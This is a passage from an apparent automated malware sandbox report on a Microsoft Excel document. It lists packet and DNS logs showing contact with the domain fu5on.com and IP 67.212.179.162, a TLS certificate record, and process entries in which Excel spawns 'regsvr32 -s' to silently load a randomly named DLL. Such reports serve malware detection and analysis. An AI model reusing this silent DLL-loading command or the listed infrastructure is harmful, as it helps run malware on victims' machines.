                                              Nov 29, 2020 04:06:29.070775986 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.070872068 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.070915937 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.070966005 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071007967 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071046114 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071064949 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071080923 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071111917 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071120024 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071124077 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071151972 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071163893 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071202993 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.071206093 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071248055 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.071265936 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.076853037 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.076901913 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.200366974 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.200429916 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.200470924 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.200472116 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.200510979 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.200515032 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.200536966 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.200544119 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.200570107 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.200599909 CET49167443192.168.2.2267.212.179.162
                                              Nov 29, 2020 04:06:29.205951929 CET4434916767.212.179.162192.168.2.22
                                              Nov 29, 2020 04:06:29.206043005 CET49167443192.168.2.2267.212.179.162

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 29, 2020 04:06:24.332304955 CET5219753192.168.2.228.8.8.8
                                              Nov 29, 2020 04:06:24.470288992 CET53521978.8.8.8192.168.2.22
                                              Nov 29, 2020 04:06:25.249252081 CET5309953192.168.2.228.8.8.8
                                              Nov 29, 2020 04:06:25.284534931 CET53530998.8.8.8192.168.2.22
                                              Nov 29, 2020 04:06:25.296897888 CET5283853192.168.2.228.8.8.8
                                              Nov 29, 2020 04:06:25.323858023 CET53528388.8.8.8192.168.2.22
                                              Nov 29, 2020 04:06:25.830624104 CET6120053192.168.2.228.8.8.8
                                              Nov 29, 2020 04:06:25.857924938 CET53612008.8.8.8192.168.2.22
                                              Nov 29, 2020 04:06:25.867666006 CET4954853192.168.2.228.8.8.8
                                              Nov 29, 2020 04:06:25.894768000 CET53495488.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 29, 2020 04:06:24.332304955 CET192.168.2.228.8.8.80xbf29Standard query (0)fu5on.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 29, 2020 04:06:24.470288992 CET8.8.8.8192.168.2.220xbf29No error (0)fu5on.com67.212.179.162A (IP address)IN (0x0001)

                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Nov 29, 2020 04:06:24.754921913 CET67.212.179.162443192.168.2.2249167CN=fu5on.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Nov 09 01:37:15 CET 2020 Thu Mar 17 17:40:46 CET 2016Sun Feb 07 01:37:15 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:04:05:43
                                              Start date:29/11/2020
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f9b0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:04:05:51
                                              Start date:29/11/2020
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                              Imagebase:0xff8b0000
                                              File size:19456 bytes
                                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >